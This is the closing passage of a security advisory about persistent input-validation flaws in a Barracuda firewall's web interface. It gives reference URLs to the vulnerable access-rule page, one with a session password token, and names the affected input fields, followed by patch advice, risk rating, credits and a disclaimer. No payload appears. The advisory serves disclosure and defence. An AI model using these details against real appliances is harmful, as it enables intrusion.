Date[Tue, 01 Oct 2013 00:35:51 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
Reference(s): URLs
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=6822f33a0a0c182212b81d743623a562&et=1380586668
&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&
secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&
popup_width=700&popup_height=850
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?locale=en_US
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a more secure filter and restriction of the `redirect to` & `ip address` input field of destination and source.
Also parse the saved selected listing in the new visible listing menu under the input fields.
Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic) page or use the regular customer panel
https://www.barracuda.com/support/knowledgebase/501600000013gvr
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities and filter bypass are estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Vulnerability Laboratory [Research Team] - Ebrahim Hegazy (ebrahim@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]